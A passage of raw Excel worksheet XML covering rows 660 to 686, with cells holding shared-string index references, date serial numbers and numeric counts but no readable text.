        <v>185</v>
      </c>
      <c r="J660" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K660" s="95" t="s">
        <v>22</v>
      </c>
      <c r="L660" t="s">
        <v>77</v>
      </c>
      <c r="M660" s="95" t="s">
        <v>1831</v>
      </c>
      <c r="Q660" s="95" t="s">
        <v>2085</v>
      </c>
      <c r="R660">
        <v>72963</v>
      </c>
      <c r="S660">
        <v>75377</v>
      </c>
      <c r="T660">
        <v>1733982</v>
      </c>
      <c r="U660">
        <v>2635731</v>
      </c>
      <c r="V660">
        <v>2662445</v>
      </c>
      <c r="W660" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="661" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A661" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B661" s="52">
        <v>43663.662263402781</v>
      </c>
      <c r="C661" s="95" t="s">
        <v>2177</v>
      </c>
      <c r="D661" s="96">
        <v>1313</v>
      </c>
      <c r="E661" s="95" t="s">
        <v>2231</v>
      </c>
      <c r="F661" s="42">
        <v>107</v>
      </c>
      <c r="G661" s="95" t="s">
        <v>2232</v>
      </c>
      <c r="H661" t="s">
        <v>2233</v>
      </c>
      <c r="I661" t="s">
        <v>185</v>
      </c>
      <c r="J661" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K661" s="95" t="s">
        <v>22</v>
      </c>
      <c r="L661" t="s">
        <v>77</v>
      </c>
      <c r="M661" s="95" t="s">
        <v>1831</v>
      </c>
      <c r="Q661" s="95" t="s">
        <v>2085</v>
      </c>
      <c r="R661">
        <v>15</v>
      </c>
      <c r="S661">
        <v>15</v>
      </c>
      <c r="T661">
        <v>3265</v>
      </c>
      <c r="U661">
        <v>5408</v>
      </c>
      <c r="V661">
        <v>5312</v>
      </c>
      <c r="W661" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="662" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A662" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B662" s="52">
        <v>43889.399719895831</v>
      </c>
      <c r="C662" s="95" t="s">
        <v>2234</v>
      </c>
      <c r="D662" s="96">
        <v>110</v>
      </c>
      <c r="E662" s="95" t="s">
        <v>2235</v>
      </c>
      <c r="F662" s="42">
        <v>110</v>
      </c>
      <c r="G662" s="95" t="s">
        <v>2236</v>
      </c>
      <c r="H662" t="s">
        <v>2237</v>
      </c>
      <c r="I662" t="s">
        <v>156</v>
      </c>
      <c r="J662" s="95" t="s">
        <v>301</v>
      </c>
      <c r="K662" s="95" t="s">
        <v>26</v>
      </c>
      <c r="L662" t="s">
        <v>77</v>
      </c>
      <c r="M662" s="95" t="s">
        <v>475</v>
      </c>
      <c r="N662" t="s">
        <v>476</v>
      </c>
      <c r="Q662" s="95" t="s">
        <v>2111</v>
      </c>
      <c r="R662">
        <v>414</v>
      </c>
      <c r="S662">
        <v>390</v>
      </c>
      <c r="T662">
        <v>6921</v>
      </c>
      <c r="U662">
        <v>12382</v>
      </c>
      <c r="V662">
        <v>16420</v>
      </c>
      <c r="W662" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="663" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A663" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B663" s="52"/>
      <c r="C663" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D663" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E663" s="95" t="s">
        <v>2238</v>
      </c>
      <c r="F663" s="42">
        <v>100</v>
      </c>
      <c r="G663" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H663" t="s">
        <v>2239</v>
      </c>
      <c r="I663" t="s">
        <v>75</v>
      </c>
      <c r="J663" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K663" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L663" t="s">
        <v>77</v>
      </c>
      <c r="M663" s="95" t="s">
        <v>237</v>
      </c>
      <c r="N663" t="s">
        <v>238</v>
      </c>
      <c r="P663" t="s">
        <v>516</v>
      </c>
      <c r="Q663" s="95" t="s">
        <v>2240</v>
      </c>
      <c r="W663" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="664" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A664" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B664" s="52">
        <v>44655.603482025464</v>
      </c>
      <c r="C664" s="95" t="s">
        <v>2241</v>
      </c>
      <c r="D664" s="96">
        <v>100</v>
      </c>
      <c r="E664" s="95" t="s">
        <v>2242</v>
      </c>
      <c r="F664" s="42">
        <v>100</v>
      </c>
      <c r="G664" s="95" t="s">
        <v>2243</v>
      </c>
      <c r="H664" t="s">
        <v>1074</v>
      </c>
      <c r="I664" t="s">
        <v>75</v>
      </c>
      <c r="J664" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K664" s="95" t="s">
        <v>29</v>
      </c>
      <c r="L664" t="s">
        <v>83</v>
      </c>
      <c r="M664" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q664" s="95" t="s">
        <v>1406</v>
      </c>
      <c r="T664">
        <v>1</v>
      </c>
      <c r="W664" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="665" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A665" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B665" s="52">
        <v>44655.603482037041</v>
      </c>
      <c r="C665" s="95" t="s">
        <v>2241</v>
      </c>
      <c r="D665" s="96">
        <v>100</v>
      </c>
      <c r="E665" s="95" t="s">
        <v>2244</v>
      </c>
      <c r="F665" s="42">
        <v>100</v>
      </c>
      <c r="G665" s="95" t="s">
        <v>2245</v>
      </c>
      <c r="H665" t="s">
        <v>1074</v>
      </c>
      <c r="I665" t="s">
        <v>75</v>
      </c>
      <c r="J665" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K665" s="95" t="s">
        <v>29</v>
      </c>
      <c r="L665" t="s">
        <v>83</v>
      </c>
      <c r="M665" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q665" s="95" t="s">
        <v>1406</v>
      </c>
      <c r="T665">
        <v>2</v>
      </c>
      <c r="W665" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="666" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A666" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B666" s="52">
        <v>44655.627096875003</v>
      </c>
      <c r="C666" s="95" t="s">
        <v>2246</v>
      </c>
      <c r="D666" s="96">
        <v>100</v>
      </c>
      <c r="E666" s="95" t="s">
        <v>2247</v>
      </c>
      <c r="F666" s="42">
        <v>100</v>
      </c>
      <c r="G666" s="95" t="s">
        <v>2248</v>
      </c>
      <c r="H666" t="s">
        <v>2249</v>
      </c>
      <c r="I666" t="s">
        <v>75</v>
      </c>
      <c r="J666" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K666" s="95" t="s">
        <v>29</v>
      </c>
      <c r="L666" t="s">
        <v>83</v>
      </c>
      <c r="M666" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q666" s="95" t="s">
        <v>1406</v>
      </c>
      <c r="T666">
        <v>7</v>
      </c>
      <c r="V666">
        <v>1</v>
      </c>
      <c r="W666" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="667" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A667" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B667" s="52">
        <v>44655.627096886572</v>
      </c>
      <c r="C667" s="95" t="s">
        <v>2246</v>
      </c>
      <c r="D667" s="96">
        <v>100</v>
      </c>
      <c r="E667" s="95" t="s">
        <v>2250</v>
      </c>
      <c r="F667" s="42">
        <v>100</v>
      </c>
      <c r="G667" s="95" t="s">
        <v>2251</v>
      </c>
      <c r="H667" t="s">
        <v>2252</v>
      </c>
      <c r="I667" t="s">
        <v>75</v>
      </c>
      <c r="J667" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K667" s="95" t="s">
        <v>29</v>
      </c>
      <c r="L667" t="s">
        <v>83</v>
      </c>
      <c r="M667" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q667" s="95" t="s">
        <v>1406</v>
      </c>
      <c r="T667">
        <v>175</v>
      </c>
      <c r="U667">
        <v>56</v>
      </c>
      <c r="W667" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="668" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A668" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B668" s="52">
        <v>44655.421492361114</v>
      </c>
      <c r="C668" s="95" t="s">
        <v>2253</v>
      </c>
      <c r="D668" s="96">
        <v>100</v>
      </c>
      <c r="E668" s="95" t="s">
        <v>2254</v>
      </c>
      <c r="F668" s="42">
        <v>100</v>
      </c>
      <c r="G668" s="95" t="s">
        <v>2255</v>
      </c>
      <c r="H668" t="s">
        <v>2256</v>
      </c>
      <c r="I668" t="s">
        <v>75</v>
      </c>
      <c r="J668" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K668" s="95" t="s">
        <v>29</v>
      </c>
      <c r="L668" t="s">
        <v>83</v>
      </c>
      <c r="M668" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q668" s="95" t="s">
        <v>1406</v>
      </c>
      <c r="W668" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="669" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A669" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B669" s="52">
        <v>44655.421492384259</v>
      </c>
      <c r="C669" s="95" t="s">
        <v>2253</v>
      </c>
      <c r="D669" s="96">
        <v>100</v>
      </c>
      <c r="E669" s="95" t="s">
        <v>2257</v>
      </c>
      <c r="F669" s="42">
        <v>100</v>
      </c>
      <c r="G669" s="95" t="s">
        <v>2258</v>
      </c>
      <c r="H669" t="s">
        <v>2259</v>
      </c>
      <c r="I669" t="s">
        <v>75</v>
      </c>
      <c r="J669" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K669" s="95" t="s">
        <v>29</v>
      </c>
      <c r="L669" t="s">
        <v>83</v>
      </c>
      <c r="M669" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q669" s="95" t="s">
        <v>1406</v>
      </c>
      <c r="T669">
        <v>348</v>
      </c>
      <c r="U669">
        <v>108</v>
      </c>
      <c r="W669" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="670" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A670" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B670" s="52">
        <v>44441.927696087965</v>
      </c>
      <c r="C670" s="95" t="s">
        <v>2260</v>
      </c>
      <c r="D670" s="96">
        <v>110</v>
      </c>
      <c r="E670" s="95" t="s">
        <v>2261</v>
      </c>
      <c r="F670" s="42">
        <v>110</v>
      </c>
      <c r="G670" s="95" t="s">
        <v>2262</v>
      </c>
      <c r="H670" t="s">
        <v>2263</v>
      </c>
      <c r="I670" t="s">
        <v>75</v>
      </c>
      <c r="J670" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K670" s="95" t="s">
        <v>29</v>
      </c>
      <c r="L670" t="s">
        <v>83</v>
      </c>
      <c r="M670" s="95" t="s">
        <v>72</v>
      </c>
      <c r="O670" s="95" t="s">
        <v>2264</v>
      </c>
      <c r="Q670" s="95" t="s">
        <v>2265</v>
      </c>
      <c r="R670">
        <v>12158107</v>
      </c>
      <c r="S670">
        <v>11019709</v>
      </c>
      <c r="T670">
        <v>10110539</v>
      </c>
      <c r="U670">
        <v>10245697</v>
      </c>
      <c r="V670">
        <v>11407036</v>
      </c>
      <c r="W670" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="671" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A671" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B671" s="52">
        <v>44099.490264282409</v>
      </c>
      <c r="C671" s="95" t="s">
        <v>2266</v>
      </c>
      <c r="D671" s="96">
        <v>101</v>
      </c>
      <c r="E671" s="95" t="s">
        <v>2267</v>
      </c>
      <c r="F671" s="42">
        <v>101</v>
      </c>
      <c r="G671" s="95" t="s">
        <v>2268</v>
      </c>
      <c r="H671" t="s">
        <v>2269</v>
      </c>
      <c r="I671" t="s">
        <v>31</v>
      </c>
      <c r="J671" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K671" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L671" t="s">
        <v>77</v>
      </c>
      <c r="M671" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N671" t="s">
        <v>263</v>
      </c>
      <c r="O671" s="95" t="s">
        <v>111</v>
      </c>
      <c r="Q671" s="95" t="s">
        <v>2270</v>
      </c>
      <c r="R671">
        <v>2246</v>
      </c>
      <c r="S671">
        <v>1721</v>
      </c>
      <c r="T671">
        <v>1861</v>
      </c>
      <c r="U671">
        <v>1804</v>
      </c>
      <c r="V671">
        <v>2007</v>
      </c>
      <c r="W671" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="672" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A672" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B672" s="52">
        <v>44292.099836921298</v>
      </c>
      <c r="C672" s="95" t="s">
        <v>2271</v>
      </c>
      <c r="D672" s="96">
        <v>100</v>
      </c>
      <c r="E672" s="95" t="s">
        <v>2267</v>
      </c>
      <c r="F672" s="42">
        <v>100</v>
      </c>
      <c r="G672" s="95" t="s">
        <v>2268</v>
      </c>
      <c r="H672" t="s">
        <v>2272</v>
      </c>
      <c r="I672" t="s">
        <v>31</v>
      </c>
      <c r="J672" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K672" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L672" t="s">
        <v>77</v>
      </c>
      <c r="M672" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N672" t="s">
        <v>263</v>
      </c>
      <c r="Q672" s="95" t="s">
        <v>2273</v>
      </c>
      <c r="R672">
        <v>2246</v>
      </c>
      <c r="S672">
        <v>1721</v>
      </c>
      <c r="T672">
        <v>1861</v>
      </c>
      <c r="U672">
        <v>1804</v>
      </c>
      <c r="V672">
        <v>2007</v>
      </c>
      <c r="W672" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="673" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A673" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B673" s="52">
        <v>44081.802624340278</v>
      </c>
      <c r="C673" s="95" t="s">
        <v>2271</v>
      </c>
      <c r="D673" s="96">
        <v>201</v>
      </c>
      <c r="E673" s="95" t="s">
        <v>2267</v>
      </c>
      <c r="F673" s="42">
        <v>201</v>
      </c>
      <c r="G673" s="95" t="s">
        <v>2268</v>
      </c>
      <c r="H673" t="s">
        <v>2272</v>
      </c>
      <c r="I673" t="s">
        <v>31</v>
      </c>
      <c r="J673" s="95" t="s">
        <v>262</v>
      </c>
      <c r="K673" s="95" t="s">
        <v>31</v>
      </c>
      <c r="L673" t="s">
        <v>77</v>
      </c>
      <c r="M673" s="95" t="s">
        <v>262</v>
      </c>
      <c r="N673" t="s">
        <v>263</v>
      </c>
      <c r="Q673" s="95" t="s">
        <v>2274</v>
      </c>
      <c r="R673">
        <v>2246</v>
      </c>
      <c r="S673">
        <v>1721</v>
      </c>
      <c r="T673">
        <v>1861</v>
      </c>
      <c r="U673">
        <v>1804</v>
      </c>
      <c r="V673">
        <v>2007</v>
      </c>
      <c r="W673" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="674" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A674" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B674" s="52">
        <v>44441.431199270832</v>
      </c>
      <c r="C674" s="95" t="s">
        <v>2275</v>
      </c>
      <c r="D674" s="96">
        <v>101</v>
      </c>
      <c r="E674" s="95" t="s">
        <v>2276</v>
      </c>
      <c r="F674" s="42">
        <v>101</v>
      </c>
      <c r="G674" s="95" t="s">
        <v>2277</v>
      </c>
      <c r="H674" t="s">
        <v>2278</v>
      </c>
      <c r="I674" t="s">
        <v>172</v>
      </c>
      <c r="J674" s="95" t="s">
        <v>173</v>
      </c>
      <c r="K674" s="95" t="s">
        <v>13</v>
      </c>
      <c r="L674" t="s">
        <v>83</v>
      </c>
      <c r="M674" s="95" t="s">
        <v>72</v>
      </c>
      <c r="N674" t="s">
        <v>522</v>
      </c>
      <c r="Q674" s="95" t="s">
        <v>523</v>
      </c>
      <c r="R674">
        <v>17617</v>
      </c>
      <c r="S674">
        <v>12407</v>
      </c>
      <c r="T674">
        <v>13862</v>
      </c>
      <c r="U674">
        <v>12495</v>
      </c>
      <c r="V674">
        <v>11688</v>
      </c>
      <c r="W674" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="675" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A675" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B675" s="52">
        <v>44435.729944456019</v>
      </c>
      <c r="C675" s="95" t="s">
        <v>2279</v>
      </c>
      <c r="D675" s="96">
        <v>122</v>
      </c>
      <c r="E675" s="95" t="s">
        <v>2280</v>
      </c>
      <c r="F675" s="42">
        <v>102</v>
      </c>
      <c r="G675" s="95" t="s">
        <v>2281</v>
      </c>
      <c r="H675" t="s">
        <v>2282</v>
      </c>
      <c r="I675" t="s">
        <v>82</v>
      </c>
      <c r="J675" s="95" t="s">
        <v>43</v>
      </c>
      <c r="K675" s="95" t="s">
        <v>24</v>
      </c>
      <c r="L675" t="s">
        <v>83</v>
      </c>
      <c r="M675" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q675" s="95" t="s">
        <v>2283</v>
      </c>
      <c r="R675">
        <v>121</v>
      </c>
      <c r="S675">
        <v>124</v>
      </c>
      <c r="T675">
        <v>58</v>
      </c>
      <c r="U675">
        <v>54</v>
      </c>
      <c r="V675">
        <v>58</v>
      </c>
      <c r="W675" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="676" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A676" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B676" s="52">
        <v>44209.75518915509</v>
      </c>
      <c r="C676" s="95" t="s">
        <v>2279</v>
      </c>
      <c r="D676" s="96">
        <v>122</v>
      </c>
      <c r="E676" s="95" t="s">
        <v>2284</v>
      </c>
      <c r="F676" s="42">
        <v>101</v>
      </c>
      <c r="G676" s="95" t="s">
        <v>2285</v>
      </c>
      <c r="H676" t="s">
        <v>2286</v>
      </c>
      <c r="I676" t="s">
        <v>82</v>
      </c>
      <c r="J676" s="95" t="s">
        <v>43</v>
      </c>
      <c r="K676" s="95" t="s">
        <v>24</v>
      </c>
      <c r="L676" t="s">
        <v>83</v>
      </c>
      <c r="M676" s="95" t="s">
        <v>72</v>
      </c>
      <c r="O676" s="95" t="s">
        <v>111</v>
      </c>
      <c r="Q676" s="95" t="s">
        <v>2283</v>
      </c>
      <c r="R676">
        <v>6897</v>
      </c>
      <c r="S676">
        <v>5840</v>
      </c>
      <c r="T676">
        <v>4722</v>
      </c>
      <c r="U676">
        <v>4591</v>
      </c>
      <c r="V676">
        <v>4572</v>
      </c>
      <c r="W676" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="677" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A677" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B677" s="52">
        <v>44435.729944467595</v>
      </c>
      <c r="C677" s="95" t="s">
        <v>2279</v>
      </c>
      <c r="D677" s="96">
        <v>122</v>
      </c>
      <c r="E677" s="95" t="s">
        <v>2287</v>
      </c>
      <c r="F677" s="42">
        <v>102</v>
      </c>
      <c r="G677" s="95" t="s">
        <v>2288</v>
      </c>
      <c r="H677" t="s">
        <v>2289</v>
      </c>
      <c r="I677" t="s">
        <v>82</v>
      </c>
      <c r="J677" s="95" t="s">
        <v>43</v>
      </c>
      <c r="K677" s="95" t="s">
        <v>24</v>
      </c>
      <c r="L677" t="s">
        <v>83</v>
      </c>
      <c r="M677" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q677" s="95" t="s">
        <v>2283</v>
      </c>
      <c r="W677" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="678" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A678" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B678" s="52">
        <v>44435.729944409723</v>
      </c>
      <c r="C678" s="95" t="s">
        <v>2279</v>
      </c>
      <c r="D678" s="96">
        <v>122</v>
      </c>
      <c r="E678" s="95" t="s">
        <v>2290</v>
      </c>
      <c r="F678" s="42">
        <v>103</v>
      </c>
      <c r="G678" s="95" t="s">
        <v>2291</v>
      </c>
      <c r="H678" t="s">
        <v>2292</v>
      </c>
      <c r="I678" t="s">
        <v>82</v>
      </c>
      <c r="J678" s="95" t="s">
        <v>43</v>
      </c>
      <c r="K678" s="95" t="s">
        <v>24</v>
      </c>
      <c r="L678" t="s">
        <v>83</v>
      </c>
      <c r="M678" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q678" s="95" t="s">
        <v>2283</v>
      </c>
      <c r="R678">
        <v>1710</v>
      </c>
      <c r="S678">
        <v>4274</v>
      </c>
      <c r="T678">
        <v>2877</v>
      </c>
      <c r="U678">
        <v>3191</v>
      </c>
      <c r="V678">
        <v>2013</v>
      </c>
      <c r="W678" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="679" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A679" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B679" s="52">
        <v>44400.387266226855</v>
      </c>
      <c r="C679" s="95" t="s">
        <v>2293</v>
      </c>
      <c r="D679" s="96">
        <v>100</v>
      </c>
      <c r="E679" s="95" t="s">
        <v>2294</v>
      </c>
      <c r="F679" s="42">
        <v>100</v>
      </c>
      <c r="G679" s="95" t="s">
        <v>2295</v>
      </c>
      <c r="H679" t="s">
        <v>2296</v>
      </c>
      <c r="I679" t="s">
        <v>82</v>
      </c>
      <c r="J679" s="95" t="s">
        <v>43</v>
      </c>
      <c r="K679" s="95" t="s">
        <v>24</v>
      </c>
      <c r="L679" t="s">
        <v>83</v>
      </c>
      <c r="M679" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q679" s="95" t="s">
        <v>1325</v>
      </c>
      <c r="S679">
        <v>8</v>
      </c>
      <c r="T679">
        <v>2</v>
      </c>
      <c r="U679">
        <v>75</v>
      </c>
      <c r="V679">
        <v>92</v>
      </c>
      <c r="W679" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="680" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A680" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B680" s="52">
        <v>44400.387266215279</v>
      </c>
      <c r="C680" s="95" t="s">
        <v>2293</v>
      </c>
      <c r="D680" s="96">
        <v>100</v>
      </c>
      <c r="E680" s="95" t="s">
        <v>2297</v>
      </c>
      <c r="F680" s="42">
        <v>100</v>
      </c>
      <c r="G680" s="95" t="s">
        <v>2298</v>
      </c>
      <c r="H680" t="s">
        <v>2299</v>
      </c>
      <c r="I680" t="s">
        <v>82</v>
      </c>
      <c r="J680" s="95" t="s">
        <v>43</v>
      </c>
      <c r="K680" s="95" t="s">
        <v>24</v>
      </c>
      <c r="L680" t="s">
        <v>83</v>
      </c>
      <c r="M680" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q680" s="95" t="s">
        <v>1325</v>
      </c>
      <c r="W680" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="681" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A681" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B681" s="52">
        <v>44425.802171331015</v>
      </c>
      <c r="C681" s="95" t="s">
        <v>2300</v>
      </c>
      <c r="D681" s="96">
        <v>111</v>
      </c>
      <c r="E681" s="95" t="s">
        <v>2301</v>
      </c>
      <c r="F681" s="42">
        <v>111</v>
      </c>
      <c r="G681" s="95" t="s">
        <v>2302</v>
      </c>
      <c r="H681" t="s">
        <v>2303</v>
      </c>
      <c r="I681" t="s">
        <v>82</v>
      </c>
      <c r="J681" s="95" t="s">
        <v>43</v>
      </c>
      <c r="K681" s="95" t="s">
        <v>24</v>
      </c>
      <c r="L681" t="s">
        <v>83</v>
      </c>
      <c r="M681" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q681" s="95" t="s">
        <v>2283</v>
      </c>
      <c r="R681">
        <v>88076</v>
      </c>
      <c r="S681">
        <v>160821</v>
      </c>
      <c r="T681">
        <v>94299</v>
      </c>
      <c r="U681">
        <v>86298</v>
      </c>
      <c r="V681">
        <v>74860</v>
      </c>
      <c r="W681" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="682" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A682" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B682" s="52">
        <v>44434.822725185186</v>
      </c>
      <c r="C682" s="95" t="s">
        <v>2304</v>
      </c>
      <c r="D682" s="96">
        <v>102</v>
      </c>
      <c r="E682" s="95" t="s">
        <v>2305</v>
      </c>
      <c r="F682" s="42">
        <v>102</v>
      </c>
      <c r="G682" s="95" t="s">
        <v>2306</v>
      </c>
      <c r="H682" t="s">
        <v>2307</v>
      </c>
      <c r="I682" t="s">
        <v>82</v>
      </c>
      <c r="J682" s="95" t="s">
        <v>43</v>
      </c>
      <c r="K682" s="95" t="s">
        <v>24</v>
      </c>
      <c r="L682" t="s">
        <v>83</v>
      </c>
      <c r="M682" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q682" s="95" t="s">
        <v>2308</v>
      </c>
      <c r="R682">
        <v>2527</v>
      </c>
      <c r="S682">
        <v>4084</v>
      </c>
      <c r="T682">
        <v>2396</v>
      </c>
      <c r="U682">
        <v>2598</v>
      </c>
      <c r="V682">
        <v>3968</v>
      </c>
      <c r="W682" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="683" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A683" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B683" s="52">
        <v>44184.075663888892</v>
      </c>
      <c r="C683" s="95" t="s">
        <v>2309</v>
      </c>
      <c r="D683" s="96">
        <v>100</v>
      </c>
      <c r="E683" s="95" t="s">
        <v>2310</v>
      </c>
      <c r="F683" s="42">
        <v>100</v>
      </c>
      <c r="G683" s="95" t="s">
        <v>2311</v>
      </c>
      <c r="H683" t="s">
        <v>2296</v>
      </c>
      <c r="I683" t="s">
        <v>203</v>
      </c>
      <c r="J683" s="95" t="s">
        <v>204</v>
      </c>
      <c r="K683" s="95" t="s">
        <v>24</v>
      </c>
      <c r="L683" t="s">
        <v>83</v>
      </c>
      <c r="M683" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q683" s="95" t="s">
        <v>161</v>
      </c>
      <c r="W683" t="s">
        <v>304</v>
      </c>
    </row>
    <row r="684" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A684" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B684" s="52">
        <v>44200.399547685185</v>
      </c>
      <c r="C684" s="95" t="s">
        <v>2309</v>
      </c>
      <c r="D684" s="96">
        <v>110</v>
      </c>
      <c r="E684" s="95" t="s">
        <v>2310</v>
      </c>
      <c r="F684" s="42">
        <v>110</v>
      </c>
      <c r="G684" s="95" t="s">
        <v>2311</v>
      </c>
      <c r="H684" t="s">
        <v>2296</v>
      </c>
      <c r="I684" t="s">
        <v>203</v>
      </c>
      <c r="J684" s="95" t="s">
        <v>204</v>
      </c>
      <c r="K684" s="95" t="s">
        <v>24</v>
      </c>
      <c r="L684" t="s">
        <v>83</v>
      </c>
      <c r="M684" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q684" s="95" t="s">
        <v>2312</v>
      </c>
      <c r="R684">
        <v>8</v>
      </c>
      <c r="S684">
        <v>1</v>
      </c>
      <c r="T684">
        <v>11</v>
      </c>
      <c r="U684">
        <v>11</v>
      </c>
      <c r="V684">
        <v>42</v>
      </c>
      <c r="W684" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="685" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A685" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B685" s="52"/>
      <c r="C685" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D685" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E685" s="95" t="s">
        <v>2313</v>
      </c>
      <c r="F685" s="42">
        <v>100</v>
      </c>
      <c r="G685" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H685" t="s">
        <v>2314</v>
      </c>
      <c r="I685" t="s">
        <v>103</v>
      </c>
      <c r="J685" s="95" t="s">
        <v>147</v>
      </c>
      <c r="K685" s="95" t="s">
        <v>35</v>
      </c>
      <c r="L685" t="s">
        <v>83</v>
      </c>
      <c r="M685" s="95" t="s">
        <v>148</v>
      </c>
      <c r="N685" t="s">
        <v>149</v>
      </c>
      <c r="P685" t="s">
        <v>2315</v>
      </c>
      <c r="Q685" s="95" t="s">
        <v>2316</v>
      </c>
      <c r="W685" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="686" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A686" s="95" t="s">
        <v>5</v>
      </c>
      <c r="B686" s="52"/>
      <c r="C686" s="95" t="s">
        <v>72</v>
      </c>
      <c r="D686" s="96" t="s">
        <v>72</v>
      </c>
      <c r="E686" s="95" t="s">
        <v>2317</v>
      </c>
      <c r="F686" s="42">
        <v>100</v>
      </c>
      <c r="G686" s="95" t="s">
        <v>72</v>
      </c>
      <c r="H686" t="s">
        <v>2318</v>
      </c>
      <c r="I686" t="s">
        <v>75</v>
      </c>
      <c r="J686" s="95" t="s">
        <v>76</v>
      </c>
      <c r="K686" s="95" t="s">
        <v>15</v>
      </c>
      <c r="L686" t="s">
        <v>83</v>
      </c>
      <c r="M686" s="95" t="s">
        <v>90</v>
      </c>
      <c r="N686" t="s">
        <v>221</v>
      </c>
